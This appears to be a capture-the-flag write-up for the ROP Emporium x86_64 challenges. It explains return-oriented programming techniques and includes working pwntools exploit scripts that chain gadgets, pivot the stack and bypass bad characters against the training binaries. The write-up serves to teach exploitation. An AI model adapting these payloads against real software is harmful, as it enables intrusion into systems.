ROPEmporium x86_64

ROP Emporium is a series of challenges designed to introduce fundamental return-oriented programming (ROP) techniques. When a program has a buffer overflow vulnerability but its stack is marked non-executable with the NX bit (i.e., you cannot execute data on the stack), ROP allows us to chain existing snippets of instructions (so-called gadgets) in the program image to achieve what we want. I will be using GDB + pwndbg and pwntools for the write-up. Although not necessary, I also use debuginfod for GNU libc debug information. You can also find the complete Python scripts for each challenge here. After the first challenge, I will omit the code for finding the offset of the saved RIP and sending the payload, since it stays the same.

Before You Start

If you haven’t yet, consider reading the beginners’ guide on the ROP Emporium website first to get a taste of common tools and techniques for ROP.

ret2win

ret2win is a simple buffer overflow challenge with a twist.

Investigation

Let’s check out the binary in gdb first with gdb ret2win:

There are no protections in this challenge except NX, which means that we have to use ROP.

The main function simply prints messages and calls pwnme().

pwnme() is a bit longer. We can see that at the beginning of the function (<+8>), only 0x20 bytes are allocated for the buffer. Later, pwnme() calls read() to take input, and since the read is not limited to the size of the buffer, it is vulnerable to a buffer overflow.

Taking a quick look in radare reveals that there is a ret2win() function that we should return to.

In case you need a refresher on the stack layout, here’s what our buffer overflow attack will look like on the stack: the input overwrites the buffer and the saved rbp with garbage values and sets the return address of pwnme() to ret2win() (0x400756 in the image).

Low stack address
 
|   rbp - 0x20   | <- start of buffer
|  ...buffer...  |
|  ...buffer...  |
|  ...buffer...  |
|  ...buffer...  |
|    saved rbp   | <- rbp
| return address | <- rip
 
High stack address

Build the Payload

We are now ready to craft the payload, which consists of padding (garbage values for buffer and saved rbp on stack) and the return address. To find the exact number of characters needed for the padding (the “offset”), we can use cyclic from pwntools to generate a de Bruijn sequence and use cyclic -l (or cyclic_find() in Python) to calculate the offset from captured rip.

We found a segfault

Crash the program with a cyclic pattern:

We found the offset pattern:

In the disassembly, we can see that the cyclic sequence has set the return address to 0x6161616c6161616b. We only need the first 4 bytes in memory to find the offset. Since x86-64 is little-endian and the least significant bytes are stored first, these are the low 32 bits of the value, 0x6161616b.
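To make the arithmetic concrete, here is a minimal pure-Python sketch of what cyclic and cyclic_find() do, without pwntools. It assumes the pwntools defaults (lowercase alphabet, 4-byte subsequences); de_bruijn and cyclic_pattern are illustrative names, not pwntools functions.

```python
import struct
from itertools import islice
from string import ascii_lowercase
from typing import Iterator


def de_bruijn(alphabet: str, n: int) -> Iterator[str]:
    """Lazily yield a de Bruijn sequence in which every length-n window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int) -> Iterator[str]:
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic_pattern(length: int, n: int = 4) -> bytes:
    """Return the first `length` bytes of the sequence (illustrative helper)."""
    return "".join(islice(de_bruijn(ascii_lowercase, n), length)).encode()


pattern = cyclic_pattern(128)

# Value seen as the overwritten return address in the write-up
captured = 0x6161616C6161616B
# Little-endian: the first 4 bytes in memory are the low 32 bits of the value
needle = struct.pack("<Q", captured)[:4]
offset = pattern.find(needle)
print(needle, offset)
```

Because every 4-byte window occurs only once, the position of the window is the number of padding bytes needed before the return address.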

This process of finding the offset can be automated using pwnlib (pwntools) in Python. Here’s the relevant code borrowed from GitHub:

from pwn import *
 
# set up pwntools for this binary
elf = context.binary = ELF('ret2win')
# show everything that is being sent/received
context.log_level = 'debug'
 
# launch the binary
io = process(elf.path)
# send the cyclic pattern
io.sendline(cyclic(128))
# wait for the crash to happen
io.wait()
# grab the core dump
core = io.corefile
# the rsp points to the return address we overwrote
stack = core.rsp
# need the first (least significant) 4 bytes to determine offset
pattern = core.read(stack, 4)
 
offset = cyclic_find(pattern)

To build the payload, we can use p64() to pack an address as a 64-bit little-endian pointer:

payload = b''               # raw bytes needed
payload += b'a' * offset    # overwrite buffer with garbage
payload += p64(0x400756)    # address of ret2win()

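Alternatively, pwnlib provides a convenient function flat() for building payloads, which automatically calls cyclic_find() on pattern keys and packs addresses for you. Note that for functions imported from a shared library, elf.symbols.<symbol> gives the address of the PLT stub, not the actual runtime address inside the library. For functions defined in the binary itself, such as ret2win(), it is simply the address of the function.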

payload = flat(
    { pattern: elf.symbols.ret2win }
)

Stack Alignment

For now we can save the payload to a file and check if it works in gdb:

with open('payload.bin', 'wb') as f:
    f.write(payload)

Turns out it doesn’t:

Here we can see the infamous movaps instruction:

RSP is not 16-byte aligned:

From the screenshots above we see that the payload did work, but the program crashed at the movaps instruction. With a quick search we find that this movaps requires its stack operand, and therefore the stack pointer here, to be 16-byte aligned (the address must end in 0x0). We can quickly fix this by adding another address before the ret2win() address, since each address is an 8-byte pointer and we are 8 bytes off. To ensure that no side effects are produced, we can use a ret gadget in the binary (a gadget is a contiguous sequence of instructions that ends in ret, jmp, call, etc., so that you can chain several of them together to do what you want). The ret gadget does nothing other than pop the next address on the stack into RIP.
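The alignment argument can be checked with a little arithmetic. The sketch below is a toy model, not debugger output: the stack address is a made-up placeholder, and rsp_on_entry is an illustrative helper. It relies on the System V x86-64 convention that rsp is 16-byte aligned right before a call, so a normally called function starts with rsp % 16 == 8.

```python
WORD = 8  # size of one stack slot on x86-64


def rsp_on_entry(saved_ret_slot: int, index_in_chain: int) -> int:
    """rsp at the moment the chain entry at index_in_chain starts executing.

    Every ret pops one 8-byte slot, so reaching entry i costs i + 1 pops,
    counted from the slot that held the overwritten return address.
    """
    return saved_ret_slot + WORD * (index_in_chain + 1)


# Hypothetical address of pwnme()'s saved return address. The caller's rsp was
# 16-byte aligned before `call pwnme`, and the call pushed 8 bytes, so the
# slot address ends in 0x8.
saved_ret_slot = 0x7FFDEADBE008

direct = rsp_on_entry(saved_ret_slot, 0)    # chain: [ret2win]
with_ret = rsp_on_entry(saved_ret_slot, 1)  # chain: [ret, ret2win]

# A function entered through a real call sees rsp % 16 == 8
print(hex(direct % 16), hex(with_ret % 16))
```

Returning straight into ret2win() leaves rsp 8 bytes away from what compiled code expects at function entry, and the extra ret restores the expected value.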

ropper -f ret2win:

Our updated payload with the addition of the ret gadget:

payload = flat(
    { pattern: 0x40053e },  # ret;
    elf.symbols.ret2win     # ret2win()
)

Our payload works:

Automated Exploitation

While we could just write the payload to a file and send it to the program through stdin, it does get a bit annoying when you are testing things. From now on, we can keep writing the file for debugging purposes but use pwnlib’s utilities to start a process. As we have already done this when automating the offset-finding process, this will look pretty much the same:

io = process(elf.path)
io.sendline(payload)
io.recvuntil(b"Here's your flag:")
 
flag = io.recvall()
success(flag.decode('utf-8'))

You can view the complete script here.

split

Call `system()`

The pwnme() function can be exploited the same way with a buffer overflow.

pwnme() decompilation:

We don’t have a simple ret2win() function anymore, but the program does import system() from libc, which can be used to print the flag.

Function list in radare2:

Simply returning to system() wouldn’t work, since it requires a command as an argument. In x86-64, arguments are passed through registers (more information here). The first argument is stored in rdi, so we just need to find a gadget to set rdi. Looking at ropper output, we find pop rdi; ret; which does exactly what we want. To use the gadget, simply add the gadget address to the payload followed by the data to be popped.
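To see why the data goes right after the gadget address, here is a small stdlib-only sketch that walks a chain the way the CPU would. The two gadget addresses are the ones used in this write-up; CMDSTR and SYSTEM are placeholders chosen for illustration, and run_chain is a toy interpreter that only knows these two gadgets.

```python
import struct

RET = 0x40053E      # ret; (address from this write-up)
POP_RDI = 0x4007C3  # pop rdi; ret; (address from this write-up)
CMDSTR = 0x601060   # placeholder for the address of "/bin/cat flag.txt"
SYSTEM = 0x400560   # placeholder for the address of system()


def run_chain(chain: bytes) -> tuple[int, dict[str, int]]:
    """Walk a ROP chain one ret at a time and report where it ends up."""
    words = struct.unpack(f"<{len(chain) // 8}Q", chain)
    regs = {"rdi": 0}
    sp = 0
    while sp < len(words):
        target = words[sp]  # ret pops the next address into rip
        sp += 1
        if target == RET:
            continue  # a bare ret immediately pops again
        if target == POP_RDI:
            regs["rdi"] = words[sp]  # pop rdi consumes the following slot
            sp += 1
            continue
        return target, regs  # anything else is treated as the final call
    raise ValueError("chain ended without reaching a function")


chain = struct.pack("<4Q", RET, POP_RDI, CMDSTR, SYSTEM)
target, regs = run_chain(chain)
print(hex(target), hex(regs["rdi"]))
```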

Setter gadget in ropper:

We still need the actual string. Fortunately, the challenge binary already contains the string /bin/cat flag.txt in the .data section:

Command string found in split:

Payload & Solution

We can use the same code to find the offset for the return address. After some quick testing, we find that this binary also suffers from the same movaps stack alignment issue, which can be resolved with a ret gadget. In addition, instead of using the address of the command string from rabin2 output, we can use pwnlib’s builtin search function to make the code a bit more readable. Note that pwnlib has builtin ROP tools, but I prefer sticking to flat() since in future challenges we won’t be able to find straightforward gadgets anymore.

cmdstr = next(elf.search(b'/bin/cat flag.txt'))
system = elf.symbols.system
 
payload = flat(
    { offset: 0x000000000040053e },     # ret (movaps stack alignment)
    0x00000000004007c3,                 # pop rdi; ret;
    cmdstr,                             # rdi = "/bin/cat flag.txt"
    system                              # libc system()
)
open('payload.bin', 'wb').write(payload)

We are now ready to feed the program our payload:

io = process(elf.path)
io.recvuntil(b'> ')
io.sendline(payload)
io.recvuntil(b'Thank you!\n')
print(io.recvline().decode('utf-8'))

View the complete solution here.

callme

The callme challenge requires us to call three functions (callme_{one,two,three}()) in sequence and pass the same three arguments to each (0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d), which basically means that we need to find gadgets that let us set the three registers used for passing arguments. You can find the complete solution below.

Which Registers?

We have the same buffer overflow vulnerability in pwnme().

As for the function calls, we can open libcallme.so in gdb to check what arguments the functions accept and from which registers. The three registers used in order are rdi, rsi, and rdx.

Building the Payload

Run ropper -f callme and we find a convenient gadget that sets all three registers at once:

Since the arguments will be popped off the stack in order, the payload is simple:

popper gadget
argument 1 (0xdeadbeefdeadbeef)
argument 2 (0xcafebabecafebabe)
argument 3 (0xd00df00dd00df00d)
callme_one()
popper gadget
argument 1 (0xdeadbeefdeadbeef)
argument 2 (0xcafebabecafebabe)
argument 3 (0xd00df00dd00df00d)
callme_two()
popper gadget
argument 1 (0xdeadbeefdeadbeef)
argument 2 (0xcafebabecafebabe)
argument 3 (0xd00df00dd00df00d)
callme_three()

To build the payload:

popper = 0x000000000040093c  # pop rdi; pop rsi; pop rdx; ret;
arg1 = 0xdeadbeefdeadbeef
arg2 = 0xcafebabecafebabe
arg3 = 0xd00df00dd00df00d
 
payload = flat(
    { offset : popper },
    arg1,
    arg2,
    arg3,
    elf.symbols.callme_one,
 
    popper,
    arg1,
    arg2,
    arg3,
    elf.symbols.callme_two,
 
    popper,
    arg1,
    arg2,
    arg3,
    elf.symbols.callme_three,
)

View the complete code here.

write4

For write4, we have to print the flag using the print_file() function from the shared object. However, this time the binary doesn’t just contain a "flag.txt" string out of nowhere, so we will have to write the string to memory ourselves. The code for exploiting pwnme() and sending the payload is exactly the same as the one we used before.

Write Gadget

We need a write gadget that lets us write bytes somewhere in memory so that we can pass that address to the print function. We know from the challenge page that a write gadget generally looks like mov [dest_reg], src_reg, where we write the value in src_reg to an address in dest_reg. Let’s start looking for them in ropper output.

Found a write gadget:

Popper to use with the write gadget:

write8

With the gadget we found we can easily write the entirety of the argument ("flag.txt", 8 bytes = 64 bits) into memory. The next question is where. One of the most reliable options is the .data section (I tried the stack and it didn’t work), where global and static variables are kept.
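As a quick sanity check on the "8 bytes = one register" claim, the sketch below models the write with the standard library only. The memory bytearray is a toy stand-in for .data and is assumed to be zero-filled, which is also what provides the terminating NUL byte; write_qword is an illustrative helper, not part of any library.

```python
import struct

DATA_BASE = 0x601028    # .data address used in this write-up
memory = bytearray(16)  # toy model of .data, assumed to start zero-filled


def write_qword(addr: int, value: int) -> None:
    """Model of `mov qword ptr [r14], r15` with r14 = addr and r15 = value."""
    off = addr - DATA_BASE
    memory[off:off + 8] = struct.pack("<Q", value)


# The 8 bytes of the filename, viewed as the 64-bit value popped into r15
r15 = struct.unpack("<Q", b"flag.txt")[0]
write_qword(DATA_BASE, r15)

# What a C function would see when reading a string from DATA_BASE
c_string = bytes(memory).split(b"\x00", 1)[0]
print(hex(r15), c_string)
```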

.data is writable and large enough:

Here’s the payload:

pop_r14_r15 = 0x0000000000400690  # pop r14; pop r15; ret;
write_data = 0x0000000000400628   # mov qword ptr [r14], r15; ret;
straddr = 0x00601028              # .data
pop_rdi = 0x0000000000400693      # pop rdi; ret;
payload = flat(
    { offset : pop_r14_r15 },
    straddr,
    b'flag.txt',
    write_data,
    pop_rdi,
    straddr,
    elf.symbols.print_file
)

View the complete code here.

badchars

In badchars, we find that not all bytes are acceptable as input. To bypass the badchars, we need to configure the ROP chain finder and also encode the filename using XOR then decode it in memory.

It’s XORing Time

Finding bad chars:

Using ropper with badchars option (hex-encoded):

Encoders like shikata ga nai use many techniques to avoid bad characters, but for our purposes we can just use plain XOR. Time to find some xor gadgets:

I can’t find pop rdx, so I guess we are stuck with the first XOR gadget.

With these, we can control the first XOR gadget:

Here we find a write gadget:

We can use this to set print_file()’s argument (rdi):

One approach to avoiding the bad chars is to XOR the data ("flag.txt") with a single byte in the payload and XOR the data against the same byte in our ROP chain. While doing so, we have to make sure that everything in the ROP chain is badchar-free, meaning that we need to find the right key through trial and error. Since our gadget XORs one byte at a time, we need eight iterations for the entirety of the filename.
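The trial and error can be partly automated. The following sketch assumes the bad characters are 'x', 'g', 'a' and '.' (an assumption on my part, since the list only appears in the screenshot) and uses the .data address from this write-up. It checks which single-byte keys give a clean encoding and which destination addresses contain a bad byte once packed.

```python
import struct

BADCHARS = b"xga."  # assumption: the set reported by the challenge binary
FILENAME = b"flag.txt"
DATA_BASE = 0x601028  # .data address used in this write-up


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def is_clean(data: bytes) -> bool:
    """True if data contains none of the bad characters."""
    return not any(b in BADCHARS for b in data)


# Keys for which neither the key byte nor the encoded filename is filtered
usable_keys = [
    k for k in range(1, 256)
    if is_clean(bytes([k])) and is_clean(xor_bytes(FILENAME, k))
]

key = ord("0")
encoded = xor_bytes(FILENAME, key)

# Addresses also travel through the filter, one per decoded byte
bad_unshifted = [i for i in range(8) if not is_clean(struct.pack("<Q", DATA_BASE + i))]
bad_shifted = [i for i in range(8) if not is_clean(struct.pack("<Q", DATA_BASE + 8 + i))]
print(encoded, bad_unshifted, bad_shifted)
```

Under these assumptions, one of the unshifted addresses contains the byte 0x2e ('.'), which is one reason to move the string a few bytes further into .data.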

Building Payload with a Loop

This took me quite some time to get right, but basically I had to shift the string address and try different keys to get the filename to decode correctly.

ret = 0x00000000004004ee        # ret;
pop_regs = 0x000000000040069c   # pop r12; pop r13; pop r14; pop r15; ret;
write_data = 0x0000000000400634 # mov qword ptr [r13], r12; ret;
xor_data = 0x0000000000400628   # xor byte ptr [r15], r14b; ret;
straddr = 0x00601028 + 8        # .data (shifted to avoid badchar during decode)
pop_r15 = 0x00000000004006a2    # pop r15; ret;
pop_rdi = 0x00000000004006a3    # pop rdi; ret;
key = b'0'
 
def xor_rep(m: bytes, k: bytes) -> bytes:
    return bytes([ch ^ k[i % len(k)] for i, ch in enumerate(m)])
 
# write our encoded filename to memory first
args = [
    { 40 : ret },
    pop_regs,
    xor_rep(b'flag.txt', key),  # r12
    straddr,                    # r13
    key*8,                      # r14 (r14b)
    straddr,                    # r15
    write_data,
]
# decode the filename
for i in range(8):
    args.extend([ pop_r15, straddr + i, xor_data ])
# call target function
args.extend([ pop_rdi, straddr, elf.symbols.print_file ])
 
payload = flat(*args)

View the complete code here.

fluff

For fluff we have to combine some random instructions to get a write gadget.

where gadgets

Hmm. Nothing useful here.

Let’s check out the hint:

So we have some gadgets that are not so straightforward. After reading the documentation for xlat, bextr, and stos, we find that they can indeed be combined to create a write gadget:

bextr rbx, rcx, rdx

We can use this to set rbx for the next gadget, xlat.
Bits are extracted from rcx (2nd operand) to rbx (1st operand).
We need to subtract 0x3ef2 from the value we pop into rcx to offset the add instruction at <+4>.
The lower 8 bits (dl) of rdx (3rd operand) are treated as the starting bit index, and the next 8 bits (dh) specify the length of the bit field.
We can basically set rdx[7:0] to 0 and rdx[15:8] to 64 in order to simulate mov rbx, rcx.
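The notes above can be checked with a small Python model of bextr. This is a sketch of the instruction's documented behaviour for 64-bit operands, not an emulator; bextr and gadget_rbx are illustrative names and the target address is a placeholder.

```python
MASK64 = (1 << 64) - 1


def bextr(src: int, control: int) -> int:
    """Extract control[15:8] bits from src, starting at bit control[7:0]."""
    start = control & 0xFF
    length = (control >> 8) & 0xFF
    return (src >> start) & ((1 << length) - 1) & MASK64


def gadget_rbx(popped_rdx: int, popped_rcx: int) -> int:
    """Model of: pop rdx; pop rcx; add rcx, 0x3ef2; bextr rbx, rcx, rdx."""
    rcx = (popped_rcx + 0x3EF2) & MASK64
    return bextr(rcx, popped_rdx)


target = 0x4003C4  # placeholder address we want to end up in rbx
rbx = gadget_rbx(64 << 8, target - 0x3EF2)
print(hex(rbx))
```

With a start of 0 and a length of 64 the extraction keeps the whole register, so the gadget behaves like mov rbx, rcx once the 0x3ef2 is compensated for.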

xlat byte ptr [rbx] (xlatb)

This uses al to index a table at [rbx] and copy a byte to al. Basically mov al, byte ptr [rbx + al].
We need to find an address that has the byte we need to write. This address is equal to rbx + al.
As for setting the source address, we could zero al, but we don’t have enough space (only 0x200) for mov eax, 0 gadgets.
We actually don’t need to zero al since we know the initial value of rax (return value of puts("Thank you!") which is 0xb).
Save al after each write. For future calls, al will be the last byte we wrote to memory.
Now that we know the value of al, we can just subtract last al value from rbx (rcx) for each call. If our desired byte is at addr, then rbx = addr - al and rbx + al == addr.

stos byte ptr [rdi], al (stosb byte [rdi], al)

This is equivalent to mov byte ptr [rdi], al, followed by an increment of rdi (assuming the direction flag is clear).
We use this in conjunction with xlat to achieve write-what-where.
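Here is a toy simulation of the xlat and stos bookkeeping, using only the standard library. The image below is a made-up 256-byte region that contains every byte value once, standing in for the bytes we would search for in the real binary; find_byte, xlat and write_string are illustrative names.

```python
IMAGE_BASE = 0x400000
image = bytes(range(256))      # toy image: every byte value appears once (assumption)
memory: dict[int, int] = {}    # toy writable memory, address -> byte


def find_byte(val: int) -> int:
    """Address of some byte in the image that equals val."""
    return IMAGE_BASE + image.index(val)


def xlat(rbx: int, al: int) -> int:
    """Model of xlatb: al = byte at [rbx + al]."""
    return image[(rbx + al) - IMAGE_BASE]


def write_string(dest: int, data: bytes, al: int = 0x0B) -> int:
    """Write data to dest one byte at a time and return the final al."""
    rdi = dest
    for val in data:
        rbx = find_byte(val) - al  # compensate for the current al
        al = xlat(rbx, al)         # al now holds the byte we want
        memory[rdi] = al           # stosb: store al at [rdi] ...
        rdi += 1                   # ... and advance rdi
    return al


final_al = write_string(0x601028, b"flag.txt")
written = bytes(memory[0x601028 + i] for i in range(8))
print(written, hex(final_al))
```

The initial al of 0xb follows the note above about the return value of puts(). After each write, al is simply the byte that was just stored.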

Craft the Write Gadget

# return value of puts() which is strlen("Thank you!\n")
last_al = 0xb
def write_byte(addr: int, val: int) -> list[object]:
    '''
    Write-what-where gadget
 
    Stack layout:
    ---- HIGH ----
    val     -- rdi = addr
    gadget  -> pop rdi; ret;
 
    gadget  -> xlat BYTE PTR ds:[rbx]
 
    val     -- rcx = val_addr - 0x3ef2 - last_al
    val     -- rdx = (64 << 8)
    gadget  -> pop rdx; pop rcx; add rcx, 0x3ef2; bextr rbx, rcx, rdx; ret;
    ---- LOW  ----
    '''
    global last_al
 
    # make sure val is a single byte
    val &= 0xff
    val_addr = next(elf.search(val.to_bytes(1, byteorder='little')))
    # to counterbalance the add instruction at 0x40062c
    val_addr -= 0x3ef2
    # for xlat; make sure rbx + al is still equal to the original address
    val_addr -= last_al
    # afterwards, al will be set to the byte we are about to write
    last_al = val
 
    return [
        0x000000000040062a, # pop rdx; pop rcx; add rcx, 0x3ef2; bextr rbx, rcx, rdx; ret;
        64 << 8,            # rdx[7:0] = start bit (0); rdx[15:8] = how many bits to read from rcx
        val_addr,           # modified address of the val byte
 
        0x0000000000400628, # xlat BYTE PTR ds:[rbx]; ret
 
        0x00000000004006a3, # pop rdi; ret;
        addr,               # rdi = addr
 
        0x0000000000400639  # stosb byte ptr [rdi], al; ret;
    ]
 
 
def write_bytes(addr: int, bs: bytes) -> list[object]:
    return [write_byte(addr + i, b) for i, b in enumerate(bs)]

…And Build the Payload

Building the payload is pretty trivial now that we have the write-bytes gadget.

str_addr = 0x00601028 # .data
payload = flat(
    { offset: write_bytes(str_addr, b'flag.txt') },
    0x00000000004006a3, # pop rdi; ret;
    str_addr,
    elf.symbols.print_file
)

View the complete code here.

pivot

For pivot we have to make two payloads, one for the stack and the other for the heap.

Why do we need to pivot?

While the pivot binary artificially creates the demand, there are oftentimes situations in which we may not have enough space on the stack to put all of our ROP chain without messing the buffer overflow up. If we somehow leak a heap address from the vulnerable program and write there, it is possible to pivot to the heap and put the rest of the payload there.

How do I pivot?

To pivot, simply set the rsp to the heap address you got so that instructions such as pop and ret now take values from the heap.
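A toy model may help here. The sketch below keeps the "stack" and the "heap" in one dictionary and interprets just the two gadgets needed for the pivot. The gadget addresses come from this write-up, while STACK, HEAP and MARKER are made-up placeholders.

```python
POP_RAX = 0x4009BB       # pop rax; ret (address from this write-up)
XCHG_RSP_RAX = 0x4009BD  # xchg rsp, rax; ret (address from this write-up)

STACK = 0x7FFD00001000   # placeholder: where the short stack chain starts
HEAP = 0x7F0000002000    # placeholder: the leaked pivot address
MARKER = 0x400000        # placeholder: first entry of the heap chain

# Toy memory, address -> 8-byte value
memory = {
    STACK: POP_RAX,
    STACK + 8: HEAP,
    STACK + 16: XCHG_RSP_RAX,
    HEAP: MARKER,
}


def run(rsp: int) -> tuple[int, int]:
    """Follow rets until an unknown address is reached; return (address, rsp)."""
    rax = 0
    while True:
        target = memory[rsp]  # ret pops the next address
        rsp += 8
        if target == POP_RAX:
            rax = memory[rsp]
            rsp += 8
        elif target == XCHG_RSP_RAX:
            rsp, rax = rax, rsp  # from here on, pops read from the heap
        else:
            return target, rsp


reached, final_rsp = run(STACK)
print(hex(reached), hex(final_rsp))
```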

How do I `ret2win()`?

The basic idea is to load the GOT entry of foothold_function() and add an offset to get ret2win(). Finding the address of GOT entry can be done through rabin2 -R pivot.

You can determine the offset between foothold_function() and ret2win() in gdb.
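The reason a fixed offset works even with ASLR can be shown with plain arithmetic. In this sketch only the difference of 279 comes from this write-up; the symbol offset and the load addresses are placeholders, and ret2win_from_got is an illustrative helper.

```python
DELTA = 279  # ret2win - foothold_function, as measured in this write-up

FOOTHOLD_OFFSET = 0x96A                   # placeholder offset inside the library
RET2WIN_OFFSET = FOOTHOLD_OFFSET + DELTA  # follows from the measured difference


def ret2win_from_got(got_value: int) -> int:
    """Runtime address of ret2win(), given the resolved GOT entry of foothold_function()."""
    return got_value + DELTA


# Two placeholder load addresses, as if the library were mapped differently on each run
results = []
for lib_base in (0x7F1234500000, 0x7FABCDE00000):
    got_value = lib_base + FOOTHOLD_OFFSET  # what the GOT holds after the first call
    results.append(ret2win_from_got(got_value) == lib_base + RET2WIN_OFFSET)
print(results)
```

Both functions live in the same mapping, so the load address cancels out and only the difference matters.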

pivot does not import ret2win():

We can determine the function address difference at runtime:

Notice how GDB doesn’t need the GOT to give you the addresses? Since foothold_function() isn’t called during normal program flow, GDB probably calculated these addresses.

Alternatively, determine function address difference using shared library:

Exploiting

To set rsp, we use the xchg gadget to swap rsp and rax. The first thing we do after we reach the heap ROP chain is go to foothold_function() to update its GOT entry. Then we do what we have to do to load the GOT entry address, add an offset to it to get to ret2win(), and then call it.

# craft payload
def build_stack_payload(heap_addr: int) -> bytes:
    return flat(
        { offset : 0x00000000004009bb }, # pop rax; ret
        heap_addr,          # we need to pivot to the heap chain
 
        0x00000000004009bd, # xchg rsp,rax; ret
    )
 
def build_heap_payload() -> bytes:
    return flat(
        elf.symbols.foothold_function, # must be on heap, since rsp has changed
        0x00000000004009bb, # pop rax; ret;
        0x601040,           # GOT entry of foothold_function()
 
        0x00000000004009c0, # mov rax, qword ptr [rax]; ret;
 
        0x00000000004007c8, # pop rbp; ret;
        279,                # ret2win - foothold_function at runtime
 
        0x00000000004009c4, # add rax, rbp; ret;
 
        0x00000000004006b0, # call rax;
    )
 
# send payload
io = process(elf.path)
io.recvuntil(b'a place to pivot: ')
heap_addr = int(io.recvline().decode('ascii').rstrip(), base=16)
 
io.recvuntil(b'> ')
io.sendline(build_heap_payload())
io.recvuntil(b'> ')
io.sendline(build_stack_payload(heap_addr))
 
io.recvuntil(b'libpivot\n')
print(io.recvline().decode('utf-8'))

View the complete code here.

ret2csu

In ret2csu we are given a universal gadget to call the ret2win() function with arguments. For more details on the gadget, see ret2csu.

Universal Gadget

I was pretty lost trying to find suitable gadgets, so naturally I read the last paragraph on the challenge page, which hints that there is a “universal ROP” gadget in __libc_csu_init. It is called “universal” because the function comes from the startup code that glibc links into programs, so binaries like this one contain it regardless of what the program itself does. The csu (“C Start-Up”) functions help libc set up programming language features (like constructors, transactional memory model, etc.). When a C program starts, __libc_csu_init gets called first to set things up, then main(), and finally __libc_csu_fini to tear things down (see __libc_csu_init). Let’s take a look at the gadget:

We can see that using the instructions at <+64> and <+67> we can set the rdx and rsi registers indirectly through r15 and r14, which we also have control over (<+96>). One thing is that this gadget only lets us set edi, which doesn’t fit an entire argument, but we can easily find a pop rdi; ret gadget elsewhere. There are, however, two real issues with this gadget that can be fixed with a bit of planning.

We have to give the call at <+73> an address that contains the address of a gadget that does not affect rdx or rsi. In other words, the gadget’s address has to be stored somewhere in the binary for us to use it, which practically limits us to pre-existing symbols in the binary.
We have to make sure that rbp and rbx are equal after the increment, otherwise the gadget will jump somewhere else at <+84>.

Issue One

To solve issue one, we would have to find a gadget that both has minimal side effects and whose address is stored in the program image itself. One candidate is the _fini symbol:

Pwnlib will help us find a location containing the address of _fini in the binary:

_fini = next(elf.search(elf.symbols._fini.to_bytes(8, byteorder='little')))

We have to make sure that r12 + rbx * 8 == _fini for the call instruction. r12 = _fini and rbx = 0 will work.

Issue Two

Since we control rbp (<+91>), we can easily bypass the jne instruction by setting rbp to the anticipated value of rbx. Knowing that we set rbx to zero and <+77> increments rbx by one, we can just set rbp to 1.
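Both issues can be checked against a small model of the gadget. The function below follows the instruction sequence as described in this section (the moves, the indirect call, the increment and the comparison). It is a sketch for reasoning about register values, and the pointer address passed as r12 is a placeholder.

```python
MASK32 = 0xFFFFFFFF


def csu_call(rbx: int, rbp: int, r12: int, r13: int, r14: int, r15: int) -> dict:
    """Model of the second half of the __libc_csu_init gadget."""
    rdx = r15                  # mov rdx, r15
    rsi = r14                  # mov rsi, r14
    rdi = r13 & MASK32         # mov edi, r13d (upper half of rdi is zeroed)
    call_slot = r12 + rbx * 8  # call qword ptr [r12 + rbx*8]
    rbx += 1                   # add rbx, 1
    return {
        "rdi": rdi,
        "rsi": rsi,
        "rdx": rdx,
        "call_slot": call_slot,
        "falls_through": rbx == rbp,  # jne is not taken when they match
    }


FINI_PTR = 0x600E48  # placeholder: a location that stores the address of _fini

state = csu_call(
    rbx=0,
    rbp=1,
    r12=FINI_PTR,
    r13=0xDEADBEEFDEADBEEF,
    r14=0xCAFEBABECAFEBABE,
    r15=0xD00DF00DD00DF00D,
)
print({name: hex(value) for name, value in state.items()})
```

The truncated rdi in the result is why a separate pop rdi; ret gadget is still needed before returning to ret2win().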

Bringing everything together

Our payload will start at <+90> to set up the registers we need, after which we ret to <+64> to set up the arguments for ret2win(). After bypassing the jne we encounter an add rsp, 0x8, which has the same effect on rsp as a pop, so we need to add a garbage value to the payload. We then find ourselves back in the same place where we set up all the registers, but this time we just have to give them garbage values to reach the ret. Remember that with this gadget we only get to set edi, so we need to ret to a pop rdi; ret gadget. Now that all three argument registers are initialized properly, we can ret to ret2win(). The payload is as follows:

rdi = 0xdeadbeefdeadbeef
rsi = 0xcafebabecafebabe
rdx = 0xd00df00dd00df00d
_fini = next(elf.search(elf.symbols._fini.to_bytes(8, byteorder='little')))
payload = flat(
    { offset : 0x000000000040069a }, # popper gadget
    0,                  # rbx
    1,                  # rbp
    _fini,              # r12
    rdi,                # r13(d) -> edi (useless)
    rsi,                # r14 -> rsi
    rdx,                # r15 -> rdx
 
    0x0000000000400680, # set up arguments
    0,                  # garbage (add rsp, 0x8)
    0,                  # rbx
    0,                  # rbp
    0,                  # r12
    0,                  # r13(d)
    0,                  # r14
    0,                  # r15
 
    0x00000000004006a3, # pop rdi; ret;
    rdi,                # rdi
 
    elf.symbols.ret2win # target function
)

View the complete code here.


2024-09-27
